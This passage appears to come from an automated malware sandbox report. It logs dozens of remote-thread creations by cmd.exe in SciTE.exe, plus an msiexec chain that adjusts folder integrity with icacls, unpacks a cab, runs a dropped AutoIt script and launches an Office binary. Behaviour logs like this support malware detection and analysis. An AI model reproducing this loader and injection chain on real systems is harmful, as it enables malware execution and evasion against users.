            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2BB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2BF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2C30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2C70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2CA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2E20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2E60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2EA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2EE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2F10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3090000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 30D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3110000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3140000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 32C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3300000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3340000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3370000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 34F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3530000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3570000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 35B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 35E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3760000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 37A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 37D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3950000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3990000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 39D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3A10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3A50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3A90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3AD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3B10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3B50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3B90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3BD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3C10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3C50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3C90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3CD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3D10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3D50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3D90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3DD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3E10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3E50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3E90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3ED0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3F10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3F50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3F90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3FD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4010000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4050000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4090000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 40D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4110000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4150000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4190000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 41D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4210000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4250000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4290000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 42D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4310000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4350000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4390000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 43D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4410000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4450000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4490000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 44D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4510000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4550000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4590000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 45D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4610000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4650000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4690000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 46D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4710000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4750000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4790000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 47D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4810000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4850000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4890000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 48D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4910000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4950000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4990000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 49D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4A10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4A50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4A90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4AD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4B10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4B50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4B90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4BD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4C10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4C50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4C90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4CD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4D10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4D50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4D90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4DD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4E10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4E50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4E90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4ED0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4F10000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4F50000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4F90000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4FD0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5000000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5180000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 51C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5200000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5240000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5280000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 52C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5300000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5340000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5380000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 53C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5400000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5440000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5480000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 54C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5500000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5540000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5580000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 55C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5600000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5640000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5680000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 56C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5700000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5740000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5780000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 57C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5800000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5840000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5880000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 58C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5900000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5940000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5980000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 59C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5A00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5A40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5A80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5AC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5B00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5B40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5B70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5CF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5D30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5D70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5DB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5DF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5E30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5E70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5EB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5EF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5F30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5F70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5FB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5FF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6030000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6070000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 60B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 60F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6130000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6170000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 61B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 61F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6230000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6270000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 62B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 62F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6330000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6370000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 63B0000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3 Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
